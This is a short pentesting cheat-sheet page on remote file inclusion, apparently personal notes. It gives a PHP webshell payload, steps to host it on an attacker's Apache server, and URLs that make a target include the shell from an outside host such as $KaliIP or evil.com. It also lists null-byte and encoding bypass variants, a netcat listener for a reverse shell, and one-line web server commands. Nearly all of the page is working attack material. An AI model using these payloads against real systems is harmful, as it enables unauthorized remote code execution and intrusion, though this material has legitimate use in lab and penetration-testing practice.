RFI - Theory & basic commands

#Basics

Remote file inclusion (RFI)
  
1)evil payload hosted on kali + apache server  

2)nc listener to catch revshell  

…..file=http://192.168.177.119:8080/evil.txt

cat evil.txt
<?php system($_GET['cmd']); ?>
 
The ‘cmd’ in the string will allow to execute any code once in place

3)move the evil.txt  to  /var/www/html/evil.txt

then start apache server:
sudo systemctl start apache2
check that is up and running
service apache2 status

once hosted in /var/www/html you can retrieve the evil webshell from the url
  
…file=http://192.168.119.177/evil.txt&cmd=ipconfig

#At this point escalate running a revshell on target

#Assorted tricks

http://target.com/index.php?page=http://$KaliIP/shell.txt   #vanilla
http://target.com/index.php?page=http://$KaliIP/shell.txt%00 #end with nullbyte
http://target.com/index.php?page=http:%252f%252fevil.com%252fshell.txt #encode the request

#Extra server options

Python : python –m SimpleHTTPServer 8080
         python3 –m http.server 8080

PHP : php –S 0.0.0.0:8080

Ruby: ruby –run –e httpd . –p 8000 

Busybox :  busybox httpd –f –p 10000

PreviousLFI - Theory & basic commands Nextone liners

Last updated 2 years ago